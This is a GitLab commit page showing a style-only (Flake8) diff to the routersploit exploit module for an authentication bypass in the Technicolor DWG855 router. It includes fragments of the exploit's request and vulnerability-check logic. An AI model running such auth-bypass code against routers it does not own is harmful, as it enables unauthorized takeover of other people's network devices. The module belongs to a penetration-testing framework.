Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
2a523a6d
Commit
2a523a6d
authored
Feb 19, 2017
by
John Mora
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Flake8
parent
5858251b
Show whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
2 additions
and
4 deletions
+2
-4
dwg855_authbypass.py
...rsploit/modules/exploits/technicolor/dwg855_authbypass.py
+2
-4
No files found.
routersploit/modules/exploits/technicolor/dwg855_authbypass.py
View file @
2a523a6d
import
base64
from
routersploit
import
(
exploits
,
print_success
,
...
...
@@ -52,7 +51,7 @@ class Exploit(exploits.Exploit):
if
response
is
None
:
print_error
(
"Target did not answer request."
)
elif
response
.
status_code
==
401
:
#Server obeys request but then sends unauthorized response. Here we send a GET request with the new creds.
#
Server obeys request but then sends unauthorized response. Here we send a GET request with the new creds.
infotab_url
=
sanitize_url
(
"{}:{}/RgSwInfo.asp"
.
format
(
self
.
target
,
self
.
port
))
check_response
=
http_request
(
method
=
"GET"
,
url
=
infotab_url
,
auth
=
(
self
.
nuser
,
self
.
npass
))
...
...
@@ -70,9 +69,8 @@ class Exploit(exploits.Exploit):
@mute
def
check
(
self
):
url
=
sanitize_url
(
"{}:{}/logo.jpg"
.
format
(
self
.
target
,
self
.
port
))
user_agent
=
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
response
=
http_request
(
method
=
"GET"
,
url
=
url
,
auth
=
(
""
,
""
))
#print response.text.encode('utf-8')
#
print response.text.encode('utf-8')
if
response
is
not
None
and
self
.
vulnresp
in
response
.
text
.
encode
(
'utf-8'
):
return
True
else
:
...
...
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment